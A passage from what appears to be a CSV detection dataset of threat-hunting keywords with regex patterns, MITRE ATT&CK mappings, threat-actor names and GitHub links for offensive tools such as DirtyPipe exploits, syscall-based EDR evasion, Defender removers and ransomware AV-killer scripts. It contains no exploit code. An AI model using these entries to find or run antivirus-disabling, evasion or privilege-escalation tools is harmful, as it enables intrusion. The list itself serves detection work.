TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","40916" "*dirdevil - PowerShell to hide data in directory structures*",".{0,1000}dirdevil\s\-\sPowerShell\sto\shide\sdata\sin\sdirectory\sstructures.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","0","N/A","powershell 
content","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","40917" "*Direct_Syscalls_Create_Thread.c*",".{0,1000}Direct_Syscalls_Create_Thread\.c.{0,1000}","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","N/A","2","186","24","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z","40918" "*Direct_Syscalls_Create_Thread.exe*",".{0,1000}Direct_Syscalls_Create_Thread\.exe.{0,1000}","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","N/A","2","186","24","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z","40919" "*Direct_Syscalls_Create_Thread.sln*",".{0,1000}Direct_Syscalls_Create_Thread\.sln.{0,1000}","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. 
This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","N/A","2","186","24","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z","40920" "*Direct_Syscalls_Create_Thread.vcxproj*",".{0,1000}Direct_Syscalls_Create_Thread\.vcxproj.{0,1000}","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","N/A","2","186","24","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z","40921" "*Directory-Traversal-Payloads.*",".{0,1000}Directory\-Traversal\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","40922" "*Direct-Syscalls-vs-Indirect-Syscalls.git*",".{0,1000}Direct\-Syscalls\-vs\-Indirect\-Syscalls\.git.{0,1000}","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. 
This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","N/A","2","186","24","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z","40923" "*dirkjan@outsidersecurity.nl*",".{0,1000}dirkjan\@outsidersecurity\.nl.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","#email","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","40924" "*dirkjan@sanoweb.nl*",".{0,1000}dirkjan\@sanoweb\.nl.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","EMBER BEAR","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","#email","N/A","10","10","1242","201","2025-04-06T13:31:57Z","2016-05-24T18:46:56Z","40925" "*dirkjanm/adidnsdump*",".{0,1000}dirkjanm\/adidnsdump.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. 
This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","1","N/A","N/A","N/A","10","997","118","2025-04-04T09:28:20Z","2019-04-24T17:18:46Z","40926" "*dirkjanm/ldapdomaindump*",".{0,1000}dirkjanm\/ldapdomaindump.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40927" "*dirkjanm/PKINITtools*",".{0,1000}dirkjanm\/PKINITtools.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40928" "*dirkjanm/PKINITtools*",".{0,1000}dirkjanm\/PKINITtools.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550.003 - T1557.002 - T1552.004 - T1212 - T1550","TA0009 - TA0008","N/A","N/A","Lateral Movement","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","N/A","8","737","82","2025-01-03T14:25:52Z","2021-07-27T19:06:09Z","40929" "*dirkjanm/PrivExchange*",".{0,1000}dirkjanm\/PrivExchange.{0,1000}","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","N/A","10","1011","173","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z","40930" "*dirkjanm/ROADtoken*",".{0,1000}dirkjanm\/ROADtoken.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","1","N/A","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","40931" "*dirscanner.py*",".{0,1000}dirscanner\.py.{0,1000}","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1083 - T1065 - T1204 - T1087 - T1203","TA0007 - TA0005 - TA0001","N/A","N/A","Reconnaissance","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","N/A","6","561","121","2025-03-28T06:59:25Z","2021-08-18T08:58:14Z","40932" "*dirscraper*",".{0,1000}dirscraper.{0,1000}","offensive_tool_keyword","dirscraper","Dirscraper is an OSINT scanning tool which assists penetration testers in identifying hidden. or previously unknown. directories on a domain or subdomain. 
This helps greatly in the recon stage of pentesting as it provide pentesters with a larger attack surface for the specific domain.","T1596 - T1530 - T1201","TA0040 - ","N/A","N/A","Reconnaissance","https://github.com/Cillian-Collins/dirscraper","1","1","N/A","N/A","N/A","3","227","32","2019-02-24T12:22:47Z","2019-02-21T23:06:58Z","40933" "*dirsearch -r -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt*",".{0,1000}dirsearch\s\-r\s\-w\s\/usr\/share\/wordlists\/seclists\/Discovery\/Web\-Content\/quickhits\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40934" "*dirTraversal.txt*",".{0,1000}dirTraversal\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","40935" "*dirTraversal-nix.txt*",".{0,1000}dirTraversal\-nix\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","40936" "*dirTraversal-win.txt*",".{0,1000}dirTraversal\-win\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","40937" 
"*dirty_sock*",".{0,1000}dirty_sock.{0,1000}","offensive_tool_keyword","POC","dirty_sock: Linux Privilege Escalation (via snapd) In January 2019. current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC","T1210 - T1211 - T1212 - T1547","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/initstring/dirty_sock","1","1","#linux","N/A","N/A","7","671","147","2019-05-09T21:34:26Z","2019-02-12T06:02:06Z","40938" "*dirty_sock/archive/master.zip*",".{0,1000}dirty_sock\/archive\/master\.zip.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","40939" "*dirtyclrdomain*",".{0,1000}dirtyclrdomain.{0,1000}","offensive_tool_keyword","DirtyCLR","An App Domain Manager Injection DLL PoC","T1055.001 - T1546.016 - T1055.013","TA0005 - TA0004","N/A","Black Basta","Privilege Escalation","https://github.com/ipSlav/DirtyCLR","1","0","N/A","N/A","7","2","170","19","2023-12-14T21:22:12Z","2023-12-11T11:29:36Z","40940" "*dirtypipe.cm4all.com*",".{0,1000}dirtypipe\.cm4all\.com.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","1","#linux","N/A","10","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","40941" "*Dirty-Pipe/exploit-static*",".{0,1000}Dirty\-Pipe\/exploit\-static.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation 
tool","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","N/A","1","9","6","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z","40942" "*dirtypipe-exploit/blob/main/dirtypipe.c*",".{0,1000}dirtypipe\-exploit\/blob\/main\/dirtypipe\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/rahul1406/cve-2022-0847dirtypipe-exploit","1","1","N/A","N/A","N/A","","N/A","","","","40943" "*-DirtyPipe-Exploits*",".{0,1000}\-DirtyPipe\-Exploits.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","1","N/A","N/A","N/A","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","40944" "*DirtyVanity.exe*",".{0,1000}DirtyVanity\.exe.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","1","N/A","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","40945" "*dirwalk.py*",".{0,1000}dirwalk\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","40946" "*'Disable all http access logs'*",".{0,1000}\'Disable\sall\shttp\saccess\slogs\'.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. 
It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","40947" "*disable_clamav.*",".{0,1000}disable_clamav\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","40948" "*disable_clamav.rb*",".{0,1000}disable_clamav\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","40949" "*Disable_Privilege /Process:* /Privilege:*",".{0,1000}Disable_Privilege\s\/Process\:.{0,1000}\s\/Privilege\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","40950" "*DisableAllWindowsSoftwareFirewalls*",".{0,1000}DisableAllWindowsSoftwareFirewalls.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","1","N/A","N/A","10","10","103","15","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z","40952" "*Disable-AMS1.ps1*",".{0,1000}Disable\-AMS1\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40953" "*DisableAMSI(*",".{0,1000}DisableAMSI\(.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. 
DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","40954" "*DisableAntiPhishing*",".{0,1000}DisableAntiPhishing.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","40955" "*DisableAntiPhishing.ps1*",".{0,1000}DisableAntiPhishing\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","40956" "*DisableAntivirusProtection.reg*",".{0,1000}DisableAntivirusProtection\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40957" "*DisableBitdefenderAV.exe*",".{0,1000}DisableBitdefenderAV\.exe.{0,1000}","offensive_tool_keyword","Dispossessor","tool used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40958" "*DisableBitdefenderAV-1.bat*",".{0,1000}DisableBitdefenderAV\-1\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40959" "*DisableBitdefenderAV-2.bat*",".{0,1000}DisableBitdefenderAV\-2\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40960" 
"*DisableBitdefenderAV-3.bat*",".{0,1000}DisableBitdefenderAV\-3\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40961" "*DisableBitdefenderAV-4.bat*",".{0,1000}DisableBitdefenderAV\-4\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40962" "*DisableBitdefenderAV-5.bat*",".{0,1000}DisableBitdefenderAV\-5\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40963" "*DisableBitdefenderAV-6.bat*",".{0,1000}DisableBitdefenderAV\-6\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40964" "*DisableBitdefenderAV-7.bat*",".{0,1000}DisableBitdefenderAV\-7\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40965" 
"*DisableBitdefenderAV-8.bat*",".{0,1000}DisableBitdefenderAV\-8\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40966" "*DisableBitdefenderAV-9.bat*",".{0,1000}DisableBitdefenderAV\-9\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove AV","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40967" "*DisableCylance.ps1*",".{0,1000}DisableCylance\.ps1.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","PowerShell wrapper for a Cylance Bypass","T1055 - T1068 - T1562.001","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/xorrior/RandomPS-Scripts","1","1","N/A","N/A","8","4","318","86","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z","40968" "*DisableDefender.ps1*",".{0,1000}DisableDefender\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40969" 
"*DisableDefenderandSecurityCenterNotifications.reg*",".{0,1000}DisableDefenderandSecurityCenterNotifications\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40970" "*DisableDefenderPolicies.reg*",".{0,1000}DisableDefenderPolicies\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40971" "*DisableDevDriveProtection.reg*",".{0,1000}DisableDevDriveProtection\.reg.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40972" "*disableeventvwr/*.ps1*",".{0,1000}disableeventvwr\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 